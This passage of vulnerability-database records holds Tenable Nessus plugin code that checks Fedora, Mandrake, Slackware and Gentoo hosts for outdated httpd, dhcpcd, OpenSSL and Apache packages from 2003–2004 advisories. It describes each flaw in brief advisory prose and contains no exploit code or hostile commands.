script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"httpd-2.0.49-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"httpd-debuginfo-2.0.49-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"httpd-devel-2.0.49-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"httpd-manual-2.0.49-1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"mod_ssl-2.0.49-1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:12:52", "description": "A vulnerability was discovered by Simon Kelley in the dhcpcd DHCP client daemon. dhcpcd has the ability to execute an external script named dhcpcd-<interface>.exe when an IP address is assigned to that network interface. The script sources the file /var/lib/dhcpcd/dhcpcd-<interface>.info which contains shell variables and DHCP assignment information. The way quotes are handled inside these assignments is flawed, and a malicious DHCP server can execute arbitrary shell commands on the vulnerable DHCP client system. This can also be exploited by an attacker able to spoof DHCP responses.\n\nMandrake Linux packages contain a sample /etc/dhcpc/dhcpcd.exe file and encourages all users to upgrade immediately. Please note that when you do upgrade, you will have to restart the network for the changes to take proper effect by issuing 'service network restart' as root.", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : dhcpcd (MDKSA-2003:003)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1403", "CVE-2003-0066"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dhcpcd", "cpe:/o:mandrakesoft:mandrake_linux:7.2", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "cpe:/o:mandrakesoft:mandrake_linux:9.0"], "id": "MANDRAKE_MDKSA-2003-003.NASL", "href": "https://www.tenable.com/plugins/nessus/13988", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:003. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13988);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-1403\", \"CVE-2003-0066\");\n script_xref(name:\"MDKSA\", value:\"2003:003\");\n\n script_name(english:\"Mandrake Linux Security Advisory : dhcpcd (MDKSA-2003:003)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered by Simon Kelley in the dhcpcd DHCP\nclient daemon. dhcpcd has the ability to execute an external script\nnamed dhcpcd-<interface>.exe when an IP address is assigned to that\nnetwork interface. The script sources the file\n/var/lib/dhcpcd/dhcpcd-<interface>.info which contains shell variables\nand DHCP assignment information. The way quotes are handled inside\nthese assignments is flawed, and a malicious DHCP server can execute\narbitrary shell commands on the vulnerable DHCP client system. This\ncan also be exploited by an attacker able to spoof DHCP responses.\n\nMandrake Linux packages contain a sample /etc/dhcpc/dhcpcd.exe file\nand encourages all users to upgrade immediately. Please note that when\nyou do upgrade, you will have to restart the network for the changes\nto take proper effect by issuing 'service network restart' as root.\"\n );\n # http://www.phystech.com/download/dhcdcd_changelog.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.helpnetsecurity.com?id=1473\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dhcpcd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcpcd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"dhcpcd-1.3.22pl4-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"dhcpcd-1.3.22pl4-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"dhcpcd-1.3.22pl4-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"dhcpcd-1.3.22pl4-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"dhcpcd-1.3.22pl4-1.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:29:57", "description": "According to its banner, the remote host is using a version of OpenSSL older than 0.9.6j or 0.9.7b.\n\nThis version is vulnerable to a timing-based attack that could allow an attacker to guess the content of fixed data blocks and may eventually be able to guess the value of the private RSA key of the server.\n\nAn attacker may use this implementation flaw to sniff the data going to this host and decrypt some parts of it, as well as impersonate the server and perform man-in-the-middle attacks.", "cvss3": {}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "OpenSSL < 0.9.6j / 0.9.7b Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078", "CVE-2003-0131", "CVE-2003-0147"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_PASSWORD_INTERCEPTION.NASL", "href": "https://www.tenable.com/plugins/nessus/11267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11267);\n script_version(\"1.44\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2003-0078\", \"CVE-2003-0131\", \"CVE-2003-0147\");\n script_bugtraq_id(6884, 7148);\n script_xref(name:\"RHSA\", value:\"2003:101-01\");\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2003:024\");\n\n script_name(english:\"OpenSSL < 0.9.6j / 0.9.7b Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote host is using a version\nof OpenSSL older than 0.9.6j or 0.9.7b.\n\nThis version is vulnerable to a timing-based attack that could\nallow an attacker to guess the content of fixed data blocks and\nmay eventually be able to guess the value of the private RSA key\nof the server.\n\nAn attacker may use this implementation flaw to sniff the\ndata going to this host and decrypt some parts of it, as well\nas impersonate the server and perform man-in-the-middle attacks.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20030219.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2003/052/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 0.9.6j (0.9.7b) or newer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\n#\n# The script code starts here - we rely on Apache to spit OpenSSL's\n# version. That sucks.\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"backport.inc\");\n\nif ( get_kb_item(\"CVE-2003-0078\") ) exit(0);\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:443);\n\nforeach port (ports)\n{\n banner = get_backport_banner(banner:get_http_banner(port:port));\n if ( ! banner || backported ) continue;\n if(egrep(pattern:\"^Server.*OpenSSL/0\\.9\\.([0-5][^0-9]|6[^a-z]|6[a-i])\", string:banner) || egrep(pattern:\"^Server.*OpenSSL/0\\.9\\.7(-beta|a| )\", string:banner)) security_warning(port);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:34:32", "description": "A memory leak was discovered in Apache 2.0 through 2.0.44 that can allow a remote attacker to cause a significant denial of service (DoS) by sending requests containing a lot of linefeed characters to the server.\n\nAs well, Apache does not filter terminal escape sequences from its log files, which could make it easy for an attacker to insert those sequences into the error and access logs, which could possibly be viewed by certain terminal emulators with vulnerabilities related to escape sequences.\n\nAfter upgrading these packages, be sure to restart the httpd server by executing :\n\nservice httpd restart", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : apache2 (MDKSA-2003:050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0083", "CVE-2003-0132"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache2", "p-cpe:/a:mandriva:linux:apache2-common", "p-cpe:/a:mandriva:linux:apache2-devel", "p-cpe:/a:mandriva:linux:apache2-manual", "p-cpe:/a:mandriva:linux:apache2-mod_dav", "p-cpe:/a:mandriva:linux:apache2-mod_ldap", "p-cpe:/a:mandriva:linux:apache2-mod_ssl", "p-cpe:/a:mandriva:linux:apache2-modules", "p-cpe:/a:mandriva:linux:apache2-source", "p-cpe:/a:mandriva:linux:libapr0", "cpe:/o:mandrakesoft:mandrake_linux:9.1"], "id": "MANDRAKE_MDKSA-2003-050.NASL", "href": "https://www.tenable.com/plugins/nessus/14034", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:050. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14034);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0083\", \"CVE-2003-0132\");\n script_xref(name:\"MDKSA\", value:\"2003:050\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache2 (MDKSA-2003:050)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory leak was discovered in Apache 2.0 through 2.0.44 that can\nallow a remote attacker to cause a significant denial of service (DoS)\nby sending requests containing a lot of linefeed characters to the\nserver.\n\nAs well, Apache does not filter terminal escape sequences from its log\nfiles, which could make it easy for an attacker to insert those\nsequences into the error and access logs, which could possibly be\nviewed by certain terminal emulators with vulnerabilities related to\nescape sequences.\n\nAfter upgrading these packages, be sure to restart the httpd server by\nexecuting :\n\nservice httpd restart\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-common-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-devel-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-manual-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_dav-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ldap-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ssl-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-modules-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-source-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libapr0-2.0.45-4.2mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:51:53", "description": "New apache packages are available for Slackware 8.1, 9.0, 9.1, and\n-current to fix security issues. These include a possible denial-of-service attack as well as the ability to possible pipe shell escapes through Apache's errorlog (which could create an exploit if the error log is read in a terminal program that does not filter such escapes). We recommend that sites running Apache upgrade to the new Apache package.", "cvss3": {}, "published": "2005-07-13T00:00:00", "type": "nessus", "title": "Slackware 8.1 / 9.0 / 9.1 / current : apache (SSA:2004-133-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:apache", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1"], "id": "SLACKWARE_SSA_2004-133-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18787", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-133-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18787);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\");\n script_xref(name:\"SSA\", value:\"2004-133-01\");\n\n script_name(english:\"Slackware 8.1 / 9.0 / 9.1 / current : apache (SSA:2004-133-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New apache packages are available for Slackware 8.1, 9.0, 9.1, and\n-current to fix security issues. These include a possible\ndenial-of-service attack as well as the ability to possible pipe shell\nescapes through Apache's errorlog (which could create an exploit if\nthe error log is read in a terminal program that does not filter such\nescapes). We recommend that sites running Apache upgrade to the new\nApache package.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.529643\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e6ddedc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"apache\", pkgver:\"1.3.29\", pkgarch:\"i386\", pkgnum:\"2\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"apache\", pkgver:\"1.3.29\", pkgarch:\"i386\", pkgnum:\"2\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"apache\", pkgver:\"1.3.29\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apache\", pkgver:\"1.3.31\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:17:07", "description": "The remote host is affected by the vulnerability described in GLSA-200405-22 (Apache 1.3: Multiple vulnerabilities)\n\n On 64-bit big-endian platforms, mod_access does not properly parse Allow/Deny rules using IP addresses without a netmask which could result in failure to match certain IP addresses.\n Terminal escape sequences are not filtered from error logs. This could be used by an attacker to insert escape sequences into a terminal emulator vulnerable to escape sequences.\n mod_digest does not properly verify the nonce of a client response by using a AuthNonce secret. This could permit an attacker to replay the response of another website. This does not affect mod_auth_digest.\n On certain platforms there is a starvation issue where listening sockets fails to handle short-lived connection on a rarely-accessed listening socket. This causes the child to hold the accept mutex and block out new connections until another connection arrives on the same rarely-accessed listening socket thus leading to a denial of service.\n Impact :\n\n These vulnerabilities could lead to attackers bypassing intended access restrictions, denial of service, and possibly execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2004-08-30T00:00:00", "type": "nessus", "title": "GLSA-200405-22 : Apache 1.3: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:apache", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200405-22.NASL", "href": "https://www.tenable.com/plugins/nessus/14508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200405-22.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14508);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\");\n script_xref(name:\"GLSA\", value:\"200405-22\");\n\n script_name(english:\"GLSA-200405-22 : Apache 1.3: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200405-22\n(Apache 1.3: Multiple vulnerabilities)\n\n On 64-bit big-endian platforms, mod_access does not properly parse\n Allow/Deny rules using IP addresses without a netmask which could result in\n failure to match certain IP addresses.\n Terminal escape sequences are not filtered from error logs. This could be\n used by an attacker to insert escape sequences into a terminal emulator\n vulnerable to escape sequences.\n mod_digest does not properly verify the nonce of a client response by using\n a AuthNonce secret. This could permit an attacker to replay the response of\n another website. This does not affect mod_auth_digest.\n On certain platforms there is a starvation issue where listening sockets\n fails to handle short-lived connection on a rarely-accessed listening\n socket. This causes the child to hold the accept mutex and block out new\n connections until another connection arrives on the same rarely-accessed\n listening socket thus leading to a denial of service.\n \nImpact :\n\n These vulnerabilities could lead to attackers bypassing intended access\n restrictions, denial of service, and possibly execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200405-22\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All users should upgrade to the latest stable version of Apache 1.3.\n # emerge 